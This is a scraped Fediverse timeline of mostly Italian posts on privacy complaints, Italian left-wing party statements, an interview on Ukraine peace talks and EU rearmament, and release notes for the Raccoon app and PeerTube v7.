A woman sits in front of a laptop and holds two flight tickets in her right hand. There is a hand coming out of the computer screen that holds a scanner that scans the woman's face. Above the computer screen you can see the "Ryanair" logo, indicating that Ryanair scans the face of its customers.


noyb.eu/it/want-book-ryanair-f…

Goofy 📖 🍝 reshared this.




Air traffic control audio reviewed by 404 Media shows 11 aircraft near New Jersey reporting people shining lasers at them during the ongoing drone panic.#News
#News


@RaccoonForFriendica version 0.3.2 of Raccoon has been released! 🎉🦝🎉

Changelog:
- feat: add Acknowledgements screen;
- feat: support for block quotes;
- fix: prevent crashes while loading timeline;
- fix: load suggestions and trending links;
- fix: retrieve source for post editing;
- fix: user post pagination;
- fix: images overlapping text;
- fix: detect Friendica RC versions;
- enhancement: accessibility improvements;
- enhancement: post preview;
- enhancement: exclude replies from timeline by default;
- enhancement: make Markdown mode always available;
- enhancement: l10n updates.

Thanks to all those who helped by testing and reporting bugs, submitting pull requests or translating the UI. You are mentioned in the home page and, from now, also in a dedicated screen which can be accessed from the "App information" dialog.

You are simply awesome #livefasteattrash

#friendica #friendicadev #androidapp #androiddev #fediverseapp #raccoonforfriendica #kotlin #multiplatform #kmp #compose #cmp #opensource #procyonproject



Il Gup ha chiesto il rinvio a giudizio a Napoli per i quattro fascisti di CasaPound che il 23 ottobre del 2023 picchiarono Roberto Tarallo, quasi uccidendolo. La vittima degli squadristi fu aggredita perché sul giubbotto aveva la scritta “sono antifascista” . Gli imputati sono i fratelli Acuto, Palmentano, segretario della sezione Berta di Casa Pound e proveniente da Roma e l’ucraino Taras Abhua, a testimonianza dei legami tra neofascismo e etnonazionalismo banderista. Sono stati ammessi come parti civili lo stesso Roberto Tarallo, assistito dalla nostra compagna avvocata Elena Coccia, l’ANPI, attraverso l’avvocato Maria Giorgia de Gennaro, e il comune di Napoli. Il processo è stato aggiornato al 3 febbraio 2025. Tra i capi di imputazione riguardanti i fascisti di Casa Pound non solo l’aggressione ma anche i reati sanzionati dalla legge Mancino. Ancora una volta siamo di fronte a un partito organizzato sul piano nazionale che si dichiara apertamente fascista e i cui militanti sono responsabili da anni di aggressioni e violenze tipiche dello squadrismo fascista. Quello di Napoli non è l’unico procedimento a carico di squadristi di Casa Pound. Per esempio a Bari è in corso quello per l’aggressione alla nostra ex-europarlamentare Eleonora Forenza e al compagno napoletano Antonio Perillo. Torniamo a chiedere lo scioglimento di Casa Pound e degli altri gruppi neofascisti come imporrebbe la XII disposizione della Costituzione nata dalla Resistenza.

Maurizio Acerbo, segretario nazionale, Rino Malinconico, segretario regionale e Elena Coccia segretaria di federazione del Partito della Rifondazione Comunista



Manovra: ottenuti altri 134 posti per il sostegno e dall'anno scolastico 2026/27 arrivano a 2.000 i posti aggiuntivi per gli insegnanti di sostegno.

Qui la dichiarazione del Ministro Giuseppe Valditara ▶ mim.gov.



Investors are starting to eye Bluesky, a new governance organisation for the bridge for the social web, no resolution but more tension around moderation questions, new platforms for the ATmosphere, and more!


Care compagne e cari compagni, in conclusione del secondo ciclo dei seminari autunno invernali del Partito della Rifondazione Comunista riportiamo i link di tutti e sette i seminari per permettere a chi non ha avuto modo di seguirli in diretta, di riascoltarli. Dino Greco, responsabile nazionale Formazione Prc-Se 01 Migrazioni: cambiare paradigma relatore: [...]


Capacità di guerra elettronica per le Forze armate del Qatar. L’accordo con Elt Group

@Notizie dall'Italia e dal mondo

Le Forze armate del Qatar e ELT Group hanno firmato un importante contratto per la realizzazione di un Centro unificato di guerra elettronica (Ew). Il nuovo centro sarà dotato di tecnologie all’avanguardia e rafforzerà le capacità operative delle Forze armate qatarine, segnando un passo



Ogni giorno un attentato, poi sono i russi accusati di essere terroristi... Questo col bene placido della democratica Europa...


Attenzione a cosa condividi... tu non sai cosa c'è in una foto ma Google si.


@Privacy Pride
Il post completo di Christian Bernieri è sul suo blog: garantepiracy.it/blog/cosa-ce-…
Foto e filmati inviato dappertutto... foto in posa con gli auguri di buone feste, foto delle vacanze sulla neve, recite, presepe vivente, saggio di fine anno, i bambini che crescono... su whatsapp, via signal,

Privacy Pride reshared this.



To political grifters boosting their profiles, government inaction is unacceptable, and government action cannot be trusted. There is no acceptable explanation.#Drones


Il Ministro Giuseppe Valditara ha firmato il decreto che prevede lo stanziamento di ulteriori 30 milioni, nell’ambito del #PNRR, destinati a potenziare i Percorsi per le Competenze Trasversali e per l’Orientamento (PCTO) delle scuole superiori.
#pnrr


Elena Basile - Le oligarchie liberali scelgono l’autoritarismo (con la complicità dell’intellighentia progressista) - OP-ED - L'Antidiplomatico
lantidiplomatico.it/dettnews-e…


What is probably happening with all those drone sightings; Cellebrite used as a doorway to malware; and an art project and a cease and desist.#Podcast


Si cerca di lasciar passare, in Italia, la giornata del 18 dicembre come una festività consolatoria in cui i bianchi suprematisti dimostrano di voler accogliere anche chi arriva da altri paesi. Una menzogna, si rimuove l’origine di tale giornata. Nella stessa data, ma si era nel 1990, le Nazioni Unite elaborarono una “Convenzione per la protezione dei diritti dei lavoratori migranti e delle loro famiglie”.

Un testo lungo e articolato, composto da oltre 90 articoli e tutto sommato moderato. Si limita a garantire i diritti e le tutele fondamentali per chi emigra e lavora, con generici richiami ad una convivenza e ad una parità che oggi paiono rivoluzionari. Non a caso solo i Paesi allora di emigrazione, neanche tutti, ratificarono la Convenzione. Non lo hanno fatto i paesi UE, il Brasile, gli Usa, il Canada, l’India, l’Australia e il Giappone, nemmeno il Sudafrica e i Paesi del Golfo, ovvero quelli in cui si emigra.

Guai a mettere a repentaglio il diritto a sfruttare che un colonialismo che dura da oltre 500 anni, costituisce l’ossatura dell’occidente, intende mantenere. Meglio lasciare che le decisioni – sovente negative e repressive – le prendano i singoli Stati sulla base delle proprie convenienze. E, per parlare di noi, in questi 34 anni si sono susseguiti di ogni colore, orientamento, composizione, ma questa proposta che rappresenta il minimo sindacale, non ha mai trovato l’approvazione di governi e parlamenti.

Il suo ruolo è dimenticato ovviamente anche dall’apparato mediatico che sostiene il suprematismo, pronto a criminalizzare chi emigra e non soddisfa il vincolo di subalternità, ma incapace di fare i conti con una società la cui composizione è profondamente cambiata. Per noi comuniste/i questo non è un giorno di festa ma un giorno di lotta che va tenuta alta per 365 giorni l’anno. Non ci autoassolviamo con la carità pelosa di chi solo oggi si accorge di chi aspira, ad esempio, ad avere cittadinanza, diritto di voto, welfare.

Siamo insieme a chi si rivolta e pretende un futuro diverso. La ratifica di una Convenzione dovrà segnare solo uno dei tanti passi da compiere nel segno di una lotta di classe che riafferma, partendo da ciò, la sua volontà di ricomporre ciò che il capitalismo ha frammentato.

Maurizio Acerbo, Segretario nazionale
Stefano Galieni, Responsabile immigrazione, Partito della Rifondazione Comunista – Sinistra Europea



Da Usa-Urss a Russia-Ucraina. Così la guerra ibrida cambia le operazioni di intelligence

@Notizie dall'Italia e dal mondo

L’uccisione del generale Igor Kirillov a Mosca, mediante un ordigno nascosto in un monopattino elettrico, rappresenta l’ultimo episodio di una guerra che va ben oltre il tradizionale campo di battaglia ucraino. Questa “guerra nell’ombra”



Come gestire il tuo personale social network federato (con Snac)

Il post di @giacomo@snac.tesio.it

ho incontrato Snac di Grunfink , una semplice istanza minimalista di #ActivityPub scritta in C portabile ma comunque sufficientemente potente da interagire con i front-end di Mastodon come Tusky , Fedilab o Tootle

encrypted.tesio.it/2024/12/18/…

@Che succede nel Fediverso?

#fediverso

reshared this



Gli Stati Uniti stanno proteggendo l’Italia perché l’esercito italiano non è abbastanza forte?

a parte che ci sono basi negli usa come basi usa in italia, se ti informi bene, ma le basi usa sono nato, sono in tutta europa, e sono forse l'unico motivo per cui la russia non ha ancora invaso il resto d'europa. con gente come putin funziona solo la deterrenza. per non essere attaccati serve che il nemico sappia che saresti pronto. putin ha attaccato l'ucraina perché pensava sarebbe stata una passeggiata. ma purtroppo l'ucraina per quanto male armata, come risorse umane, era il meglio dell'ex urss. e quando hanno deciso di non sentirsi più russi per putin è stato un casino. l'altra fortuna dell'ucraina era che all'europa non conveniva una russia dilagante in europa. non conveniva permettere una nuova invasione di hitler della polonia. e per fortuna dell'europa gli USA sono anti russi a prescindere (giustamente secondo la loro logica).



GAZA. La Stampa cieca: una mostra artistica sulle mura dell’ospedale di Nuseirat


@Notizie dall'Italia e dal mondo
Domenica 16 dicembre la mostra è stata così inaugurata sui muri esterni dell'ospedale Al-Awda, nel nord del campo profughi di Nuseirat, nel centro della Striscia di Gaza: "In un contesto in cui molti materiali artistici necessari per la creatività




noyb WIN: L'autorità olandese multa Netflix per 4,75 milioni di euro
Netflix è stata multata per 4,75 milioni di euro sulla base di una denuncia della Noyb del 2019
mr18 December 2024
Netflix Logo


noyb.eu/it/noyb-win-dutch-auth…




Sharkey: un progetto Fediverse bello dentro e fuori! Il post sul software del Fediverso ergonomicamente più interessante a cura di @Elena Rossini ⁂

@Che succede nel Fediverso?

c'è una piattaforma di microblogging Fediverse che è assolutamente meravigliosa e piena di caratteristiche di design brillanti che rendono il suo utilizzo un vero piacere. Il suo nome è Sharkey, è un "soft fork" di Misskey , e merita sicuramente la vostra attenzione

blog.elenarossini.com/sharkey-…



I seminari autunno-invernali di Rifondazione - Relatore: Rino Malinconico discussant: Rosa Tavella Raffaele Tecce Gloria Scarlino Lunedì 15 dicembre 2024 Per quanto corrisponda a verità il detto latino “Repetita iuvant”, ci sforzeremo di andare oltre la ricapitolazione di quanto già contenuto in molti nostri documenti. Il tema che infatti affronteremo in questo nostro incontro verterà [...]


UCRAINA - “Ci sono stati Ue che vorrebbero trattare per smembrarla e conquistarne dei pezzi”

Tusk parla di trattative sull'Ucraina in inverno, ma tutto dipende da Trump e Putin. Mentre la UE fantastica su un riarmo miliardario

Il primo ministro polacco Donald Tusk dice che Russia e Ucraina potrebbero iniziare a negoziare in inverno. Ma non sarà certo lui a fare da ago della bilancia. Toccherà a Trump e Putin sbrigarsela, spiega Gianandrea Gaiani, direttore di Analisi Difesa, e gli altri andranno al seguito, compresa la UE, che per ora non conta, anche se, secondo un piano all’apparenza da fantapolitica (ma che potrebbe non essere così fantasioso), alcuni Paesi che ne fanno parte (Polonia, Ungheria, Romania) potrebbero “pasteggiare” con ciò che resta dell’Ucraina, prendendosi regioni che un tempo erano loro. Bruxelles, intanto, fantastica su un piano da 100 miliardi di spesa per la Difesa, ma l’economia non attraversa certo un buon momento e un progetto del genere potrebbe affossarla. A meno che queste spese vengano escluse dal computo del rapporto deficit-Pil.

Donald Tusk, premier polacco, dice che le trattative sull’Ucraina potrebbero partire in inverno, proprio quando a Varsavia toccherà la presidenza di turno della UE. Il negoziato finalmente è vicino?

Se c’era una nazione che aveva la possibilità di giocare la carta dei negoziati durante la presidenza UE era l’Ungheria. Per la sua ostilità palese verso la Russia e per gli interessi su una regione ucraina come la Galizia, non vedo la Polonia come soggetto che può portare avanti una trattativa. Del resto, la Russia ha sempre sottolineato che si può negoziare solo tenendo conto della situazione sul terreno. E da quel punto di vista, anche se in Italia non ne vuole parlare più nessuno, i russi avanzano: le ultime cinque roccaforti del Donbass sono circondate e sono in procinto di cadere. Credo che Putin stia stringendo l’offensiva prima dell’insediamento di Trump.

Le pretese russe sono sempre le stesse?

Vogliono la cessione della sovranità sulla Crimea e su altre quattro regioni che oggi non controllano ancora per intero, un’Ucraina neutrale, che non entri nella NATO e non ospiti basi e armi straniere. Se ci sarà la disponibilità a trattare su questi punti, Mosca lo farà; diversamente, no. L’elemento tempo è fondamentale, perché più il tempo passa più Kiev sarà in difficoltà: già si parla di arruolare i diciottenni e i ventenni e questo comporterà la fuga di molti, un’altra generazione che si nasconderà per evitare lo sterminio in prima linea.

In realtà, quindi, Putin andrà avanti fino a che riuscirà a conquistare qualcosa?

La trattativa la gestiranno americani e russi, la UE non conta nulla. Le ultime dichiarazioni di Kaja Kallas, alta rappresentante UE per la politica estera, dimostrano il vuoto totale dell’Unione Europea, dove le uniche cose che si riescono a mostrare sono un fanatismo russofobico e il soffocamento delle libertà dei cittadini europei: il caso Romania è eclatante, persino la candidata al ballottaggio, filo-UE, ha denunciato la violazione della libertà e della democrazia con l’annullamento del voto. Gli arbitri del negoziato saranno Russia e USA, quelli di Trump, perché i colpi di coda di Biden sono tutti tesi a destabilizzare.

Insomma, non sono né Tusk né la Polonia che favoriranno il processo di pace?

Tusk è uno dei maggiori esponenti della russofobia europea, non vedo come possa far partire il dialogo. A meno che non scopriamo che c’è un accordo sottobanco fra russi e polacchi, per cui, nel momento in cui l’Ucraina tracolla, visto che Varsavia ha schierato truppe alla frontiera con Kiev con il pretesto di fare deterrenza nei confronti dei russi, la Polonia si riprenderà la Galizia. Ma a questo punto entriamo in uno scenario denso di nubi per l’Ucraina come Stato.

Va a finire che l’Ucraina entrerà sì nella UE, ma a pezzi, ognuno dei quali diventato territorio di altre nazioni?

Può sembrare uno scenario di fantapolitica, incluso quello in cui romeni, ungheresi e polacchi si riprendano le regioni che erano appartenute ai loro Stati, ma, visto quello che è successo negli ultimi tempi, non escluderei nulla.

Il vertice Trump-Macron-Zelensky, in occasione dell’inaugurazione di Notre Dame a Parigi, è servito solo al neoeletto presidente americano per ribadire che comanda lui?

L’America deciderà per l’Ucraina: la gran parte delle armi e dei soldi per continuare la guerra vengono dagli USA. Se Trump chiuderà il rubinetto, il problema è già risolto. Non sarà l’Europa a salvarla. Zelensky non ha alternative, non può combattere da solo. Biden sgancia aiuti ogni settimana, ma poi il presidente ucraino dovrà fare i conti con il nuovo inquilino della Casa Bianca.

Cosa potrà spuntare al massimo Kiev in un negoziato?

La base per iniziare il negoziato è quella che è. Certo, un conto è un accordo, un conto il cessate il fuoco. Gli americani hanno tutto l’interesse a lasciare che poi se ne occupi l’Europa.

A Washington basterebbe far tacere le armi, dopo di che mollerebbe la patata bollente a Bruxelles?

Noi europei ci ritroveremo con l’eredità pesantissima della ricostruzione dell’Ucraina e con la necessità di gestire una guerra fredda con la Russia. È esattamente quello che Trump vuole. Così dirà: “Volete la protezione nucleare americana? Dovete pagare di più”.

Intanto, Andrius Kubilius, ex presidente lituano e commissario UE per la Difesa, ha lanciato un piano per portare la spesa militare europea a 100 miliardi in sette anni. Bruxelles vuole diventare una potenza militare?

Questa UE ha portato al disastro l’Europa con la prima Commissione von der Leyen; completerà l’opera, se glielo lasciano fare, con la seconda. Il riarmo europeo è una sciocchezza gigantesca, lo dimostra il fatto che in tutti i Paesi l’opinione pubblica non sostiene il riarmo, non comprende perché dobbiamo prepararci a questa fantomatica guerra contro l’invasore russo, che nessuno vede, tranne i baltici e i polacchi.

Un piano di riarmo insostenibile?

Fare il riarmo nel momento in cui abbiamo l’economia in recessione, l’energia più cara di qualunque altra area industrializzata, non riusciamo più a produrre acciaio perché costa troppo proprio dal punto di vista dell’energia e saremo costretti a spendere in welfare per disoccupati e cassintegrati, è una follia che porterà l’Europa al disastro economico ed energetico (ci siamo già) e poi al crollo delle leadership e dei governi (e mi pare che ci siamo già anche qui). Poi, se qualcuno pensa che, per evitare il disastro del crollo dei governi, basti annullare le elezioni, ci troveremo nella stessa situazione del Patto di Varsavia nel 1956 a Budapest e nel 1968 a Praga. Solo che stavolta il Patto di Varsavia e l’Unione Sovietica siamo noi.

Insomma, anche volendo, il riarmo europeo è una chimera?

Il Regno Unito parlava di riarmo, ma alla fine, nel bilancio della Difesa del 2025, ha annunciato che ritirerà cinque navi della Royal Navy e rinuncerà a decine di droni ed elicotteri. Cento miliardi era anche lo stanziamento che fece la Germania subito dopo l’inizio della guerra in Ucraina come investimenti per la Difesa. Parlare della stessa cifra per i piani congiunti europei può avere una sua ragionevolezza soltanto se passa l’esclusione delle spese militari dal computo delle spese di bilancio per i Paesi UE. È la posizione del ministro della Difesa italiano Crosetto. Non devono essere considerate all’interno del rapporto deficit-Pil su cui l’Europa insiste.

-int. di Paolo Rossetti a Gianandrea Gaiani-

#TGP #UE #Ucraina

[Fonte: https://www.ilsussidiario.net/news/ucraina-ci-sono-stati-ue-che-vorrebbero-trattare-per-smembrarla-e-conquistarne-dei-pezzi/2779911/]




Con la nuova release 7 PeerTube rinnova completamente l'interfaccia!


@Che succede nel Fediverso?

Il comunicato di Framasoft:

Con il suo nuovissimo design, la nuova interfaccia di PeerTube non è solo più bella (anche se lo è). È anche più semplice, più facile da usare e da capire e più accessibile. Benvenuti in una nuova era di questo software che consente ai creatori di ottenere, controllare e connettere le proprie piattaforme video.

Riflettiamo sulla crescita dell'ecosistema PeerTube

Sette anni fa, PeerTube era principalmente uno strumento con cui gli appassionati di FOSS esperti di tecnologia erano felici di giocare. Poi è diventato popolare tra i creatori di contenuti che volevano uno specchio auto-ospitato dei loro canali YouTube/Twitch; e tra le comunità che volevano creare e regolamentare il loro spazio sicuro (persone sorde, persone queer, ecc.)

Oggigiorno, PeerTube sta riscuotendo un successo crescente tra i creatori di contenuti che pubblicano contenuti originali (o contenuti esclusivi per la loro comunità), media alternativi e istituzioni: college, ministeri dell'istruzione, archivi televisivi e radiofonici nazionali, ecc.

Le strutture pubbliche hanno spesso bisogno di condividere contenuti video senza meccanismi di cattura dell'attenzione o di sfruttamento dei dati.

Per noi si tratta di un nuovo passo nell'evoluzione del pubblico di PeerTube.

Ecco perché quest'anno abbiamo chiesto a La Coopérative des Internets di condurre una ricerca UX approfondita (completa di interviste, test, ecc.) e di aiutarci ad avviare una riprogettazione completa dell'interfaccia. Il nostro obiettivo era migliorare PeerTube in modo che si adattasse meglio alle esigenze di quel nuovo pubblico. Avevamo chiaro che tutto era sul tavolo: colori, vocabolario, layout...

Bene, siamo orgogliosi di rilasciare questa v7 di PeerTube , che getta le basi per una completa riorganizzazione dell'interfaccia.

Anteprima: temi, nuovi colori e vocabolario

Il design di PeerTube, gli schemi di colori, il vocabolario, ecc. sono stati costruiti in sette anni, mentre andavamo avanti, imparando, ricevendo aiuto dalla comunità. Questo nuovo design è stata un'opportunità per fare un passo indietro e ottenere alcune intenzioni dietro l'interfaccia.

Il nuovo tema predefinito Light/beige è più calmo e piacevole alla vista rispetto all'originale Black & orange. Abbiamo anche aggiunto un tema Dark/brown nel core per gli amanti della modalità scura. Entrambi mirano a facilitare la navigazione video.

Creare quei nuovi temi è stata un'opportunità per ripulire e semplificare il modo in cui è codificata l'interfaccia (in particolare: ripulire il CSS, concentrandosi sulle variabili), limitando al contempo le rotture con temi personalizzati preesistenti. Ora è davvero più facile creare nuovi temi per PeerTube e speriamo che condividerete le vostre creazioni!

Abbiamo anche aggiornato il gergo di PeerTube. C'è un motivo per cui ora stiamo usando il termine "piattaforma(e)" per parlare di tutti i server in cui è stato installato PeerTube.

Sì, chiamarli "istanza(i)" è stata la norma nel mondo esperto di tecnologia degli appassionati di activity-pub. Ma, per coloro che non sono abbastanza privilegiati da conoscere il fediverse e il suo protocollo, la parola piattaforma è autoesplicativa e facilita l'inclusione.

Godetevi layout più semplici e pertinenti

Ci sono molte informazioni da visualizzare su qualsiasi pagina di PeerTube. I layout e i menu sono cresciuti organicamente durante sette anni di sviluppo... e avevano bisogno di qualche potatura! Abbiamo rimodellato quei menu e quelle pagine per portare avanti informazioni rilevanti e presentare un modo più intuitivo per scoprire cosa stai cercando.

Ad esempio, i creatori di contenuti accedevano ai loro canali e caricavano video nella loro libreria (dove qualsiasi utente di PeerTube può accedere alle proprie playlist, cronologia, ecc. dei video guardati). Ora in PeerTube v7, c'è una nuova sezione chiamata "spazio video" specifica per le esigenze di chi carica video.

Allo stesso modo, le pagine "admin" per gli amministratori delle piattaforme PeerTube sono state ora separate in una pagina Panoramica (per ottenere maggiori informazioni sugli utenti, sui video ospitati, ecc.), una Moderazione (per gestire abusi, blocchi, registrazioni) e una Impostazioni (per accedere a configurazioni, runner, ecc.).

Le diverse pagine che presentavano i video sulla piattaforma PeerTube (Aggiunti di recente, Video locali, Di tendenza) sono state unite in una pagina "Sfoglia video" , che include filtri rapidi per visualizzare le stesse selezioni di contenuti in modo più diretto.

Lo stesso intento ha guidato il nuovo layout della pagina "Scopri video": ci auguriamo che possa dare spunti agli utenti curiosi.

Ovviamente, la barra di sinistra e i menu dell'intestazione sono stati riorganizzati per riflettere tali modifiche e rendere la navigazione ancora più intuitiva. Ora puoi accedere alle impostazioni del tuo account e alle notifiche dal menu dell'intestazione , come è consuetudine su altri siti web.

Visualizzazione di informazioni rilevanti per mostrare la diversità dei video

Uno dei commenti più frequenti dei nuovi utenti è stato che la vecchia interfaccia era confusa, ovvero era difficile per un utente capire dove si trovava e da dove provenivano i video.

Ecco perché, in PeerTube v7, abbiamo aggiunto più modi per consentire ai proprietari di piattaforme di personalizzare e identificare le proprie piattaforme : aggiungere facilmente un banner (utilizzato nelle pagine, nell'esplorazione delle app mobili e nel nostro motore di ricerca SepiaSearch ) e un'icona della piattaforma (utilizzata dall'applicazione mobile). Inoltre, il nome e la descrizione della loro piattaforma vengono ora visualizzati agli utenti non registrati nel menu di sinistra.

Abbiamo anche cambiato il modo in cui le miniature dei video appaiono in tutte le pagine che elencano i video . Gli avatar dei canali sono sempre visualizzati, quindi è più facile identificare i creatori, i titoli sono evidenziati, la data e il numero di visualizzazioni del video sono presenti ma attenuati. Queste modifiche rendono le pagine che elencano i video più facili da leggere e facilitano l'identificazione del video che vuoi guardare.

Accessibilità in prima linea

La riprogettazione è stata anche l'occasione per dare priorità all'accessibilità dell'interfaccia (per le persone con disabilità). Nel 2023, abbiamo preparato il codice e lavorato su ciò che sapevamo ... così l'audit di accessibilità completo pianificato per il 2024 (grazie al consorzio NGI Entrust) avrebbe portato quanti più miglioramenti nuovi e dettagliati possibili.

Grazie all'audit, abbiamo migliorato moltissimi aspetti : abbiamo sistemato i contrasti e i temi dei colori, la barra di avanzamento, diversi componenti e vari problemi con lo screen reader. Abbiamo aggiunto etichette mancanti sugli elementi interattivi, link "salta menu", sottolineatura dei link. Abbiamo anche migliorato la navigazione tramite tastiera e reimplementato componenti di una dipendenza non accessibile.

Crediamo sinceramente che PeerTube abbia risolto i problemi di accessibilità e dovrebbe essere all'altezza degli standard ... ma sappiamo, ora, che c'è sempre spazio per miglioramenti e per imparare direttamente da chi è interessato .

Modifica dei sottotitoli, promozione dei video e molto altro ancora...

Con il nuovissimo strumento di transcodifica remota che abbiamo introdotto l'anno scorso, ottenere una trascrizione o sottotitoli per il tuo video è più facile che mai. Ma lo strumento di modifica dei sottotitoli era... ehm... diciamo "barebone". Ora stiamo introducendo una nuova modalità che rende la modifica dei sottotitoli davvero comoda .

Abbiamo accolto e integrato a monte un contributo della comunità su SEO (ottimizzazione per i motori di ricerca), per aiutare a promuovere i contenuti ospitati da PeerTube sui motori di ricerca. Un avatar della piattaforma ora appare nei tag opengraph, gli account e i canali vuoti sono nascosti dalla mappa del sito, mentre ora sono presenti tag video aggiuntivi.

Infine, PeerTube è stato tradotto in slovacco .

Vorremmo davvero prenderci del tempo per ringraziare la comunità che contribuisce alle traduzioni di PeerTube: non avremmo mai pensato che un giorno il nostro software sarebbe stato disponibile in più di 38 lingue.

Un enorme ringraziamento a tutti voi, persone meravigliose, che avete dedicato tempo e cura per contribuire al nostro strumento di traduzione: siete straordinari.


(grazie ad alephoto85@livellosegreto.it per la segnalazione)


#PeerTube v7 is out!

Themes, pages, menus, layouts, accessibility… The whole interface gets a relooking to make your #video platforms more enjoyable and easy to use!

Here are the details: framablog.org/2024/12/17/peert…




Pechino mostra i piani di attacco contro le navi Usa. Ecco perché

@Notizie dall'Italia e dal mondo

Un recente rapporto cinese ha rivelato una lista dettagliata di obiettivi navali statunitensi, tra cui sistemi radar e sensori, che verrebbero attaccati in un potenziale conflitto futuro. La singolarità della pubblicazione di tali informazioni pone interrogativi sulla natura della mossa:



I costi della democrazia

@Politica interna, europea e internazionale

18 dicembre 2024, ore 18:00 in diretta sui social della Fondazione Interverranno Anna Paola Concia Giuseppe Benedetto Michele Magno
L'articolo I costi della democrazia proviene da Fondazione Luigi Einaudi.

fondazioneluigieinaudi.it/i-co…



È online un nuovo episodio di Václav Podcast, il podcast di Centrum Report che ogni mese vi aggiorna su quello che succede in Polonia, Repubblica Ceca, Slovacchia e Ungheria.

Potete trovarlo sul nostro sito: centrumreport.com/

Oppure potete ascoltarlo direttamente su Spreaker: spreaker.com/episode/17-praga-…

Se fate l'accesso dal sito per noi è un po' meglio perché ci aiutate in termini di indicizzazione, ma se preferite andare direttamente su Spreaker va bene uguale.

In ogni caso, come dice il grande Date Knightmare,

Grazie perché ci ascoltate